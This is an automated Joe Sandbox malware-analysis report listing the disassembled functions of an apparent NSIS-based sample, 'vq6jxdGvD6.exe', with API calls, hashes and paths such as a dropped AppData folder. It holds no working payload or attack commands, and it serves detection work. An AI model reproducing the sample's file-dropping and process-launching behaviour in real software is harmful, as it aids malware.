Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\vq6jxdGvD6.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-4130653446
Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction ID: d7521d4eade0cbd7120b41c29d2b11454b957a1e542ceee7a25420a70a1b98fd
Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction Fuzzy Hash: CFF082367082047BDB108F56DC04B9B7FA8DF91750F10803BFA08AA291D6B4B9558B69

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
GetProcAddress.KERNEL32(00000000,?), ref: 00402048
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
Instruction ID: 772c7401ca61f63a6a86f526de26f8a62e510dd82d200dd974b96084c7de1680
Opcode Fuzzy Hash: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
Instruction Fuzzy Hash: 7F21DB71B04225B7CF207FA48E49B6E7A70AB44358F20413BFB15B22D0D7BD8942D65E

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,76233410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040551C: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\unshabbily\Toral,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\unshabbily\Toral, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\unshabbily\Toral
API String ID: 1892508949-369527515
Opcode ID: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
Instruction ID: a466de0d3f6f2377f24be2a4188d25ee0cffe6e715a209702fc6e54bc549958f
Opcode Fuzzy Hash: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
Instruction Fuzzy Hash: 78112731608151EBCF217FB54C415BF2AB0DA96324B28053FE8D1B22E2D63D4D429A3F

Function 00405E16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,0040605A,80000002), ref: 00405E5C
RegCloseKey.KERNELBASE(?,?,0040605A,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405E67

Strings

: Completed, xrefs: 00405E19, 00405E4D

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
Instruction ID: 33be00f72f12327029ad1653fb2bc99e6b823e337a66ede3503504709cbc349d
Opcode Fuzzy Hash: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
Instruction Fuzzy Hash: 31015A72504209AEDF228F61CC09FEB3BA8EF55364F008426FE59A2190D778DA54CFA4

Function 004055CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
CloseHandle.KERNEL32(?), ref: 00405604

Strings

Error launching installer, xrefs: 004055E1

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction ID: f1ce92c91028e46d95f0eda4fe37c0312dcd0371124bcb88e834d1219d8c4f53
Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction Fuzzy Hash: 5BE04FF0A00209BFEB009B60EC05F7B7ABCEB00748F404961BD11F31A0E374A9108A79

Function 004069F0 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
Instruction ID: c387c58543e41996c7b199f294dd4e3f2d8ae9e2c90db5b1f56269fb3149e58b
Opcode Fuzzy Hash: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
Instruction Fuzzy Hash: 32A14271E00229CBDF28CFA8C8587ADBBB1FF44305F15806AD856BB281D7785A96DF44

Function 00406BF1 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
Instruction ID: c0a55b7bb8cda596ca91e270a613f9aea3b485865d608933a43e484043593474
Opcode Fuzzy Hash: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
Instruction Fuzzy Hash: 45913374D00229CBDF28CF98C8587ADBBB1FF44305F15812AD816BB291C7785996DF48

Function 00406907 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
Instruction ID: 33bdc002aa07cba8751fe1bb89261eb1bbd9089b315c8d097eab8488b12144ec
Opcode Fuzzy Hash: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
Instruction Fuzzy Hash: 19814575D04228DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB291C7389A96DF44

Function 0040640C Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
Instruction ID: 368e1e7272001cfb6f2dd5e39cf93d71f7d9f1f25059b380f60c2813f7b9aa4b
Opcode Fuzzy Hash: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
Instruction Fuzzy Hash: 00818735D04228DBDF28CFA8C8447ADBBB1FB44305F21816AD856BB2C1D7785A96DF48

Function 0040685A Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
Instruction ID: 563e9c7bfc12ab1e5735381274df4cd9413df1207b4ba467b436c4b8586dcceb
Opcode Fuzzy Hash: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
Instruction Fuzzy Hash: C9713471D04228DFDF28CFA8C884BADBBB1FB44305F15806AD816B7291D7389996DF58

Function 00406978 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
Instruction ID: 7154c5ac750784d404653f653373d782701dde13a8780768b6f209b569f9d9aa
Opcode Fuzzy Hash: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
Instruction Fuzzy Hash: 61714471D04228DBDF28CFA8C894BADBBB1FB44305F15806AD816BB291C7385996DF48

Function 004068C4 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
Instruction ID: 6d4e519aaefd354d35621c14bbf49efb9ee6a20a3da98f77445617ba41e869e3
Opcode Fuzzy Hash: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
Instruction Fuzzy Hash: 64715771D04229DBEF28CF98C844BADBBB1FF44305F15806AD816B7291C7389996DF48

Function 00401B5D Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BCC
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BDE

Strings

307, xrefs: 00401B84, 00401B8A, 00401BA4

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Global$AllocFree
String ID: 307
API String ID: 3394109436-3197571367
Opcode ID: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
Instruction ID: 8e70e66a58bbe0bbdc708fb34704032e6401d8afa79375c0cb6f9cb36bca9441
Opcode Fuzzy Hash: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
Instruction Fuzzy Hash: 9C2193B6704312ABCB10EBA4DD89A5A77B9DB44314720443BF606B32D1D77CE8118B5E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction ID: 2eeecbca978bd34a3a2c87f0a48c5f542c226d41099ae67583a71d3d142e8862
Opcode Fuzzy Hash: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction Fuzzy Hash: 80012831724210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Function 004062C7 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

Part of subcall function 00406259: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
Part of subcall function 00406259: wsprintfA.USER32 ref: 004062A9
Part of subcall function 00406259: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
Instruction ID: 3d2559cad02f3f2c9522d4b64a0f21e72dff4147d54ae6b068db265a7fe850db
Opcode Fuzzy Hash: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
Instruction Fuzzy Hash: 10E08C32A08111ABD3217B749D0493B77A89F8470030208BEF90AF2190D738EC61A6AD

Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\vq6jxdGvD6.exe,80000000,00000003), ref: 00405ACC
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16

Function 00405AA3 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,004056BB,?,?,00000000,0040589E,?,?,?,?), ref: 00405AA8
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405ABC

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
